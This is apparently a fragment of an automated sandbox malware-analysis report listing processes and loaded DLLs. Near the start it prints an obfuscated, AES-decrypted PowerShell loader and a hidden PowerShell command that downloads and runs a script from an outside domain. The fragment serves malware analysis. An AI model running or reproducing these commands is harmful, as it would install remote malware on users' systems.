1846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
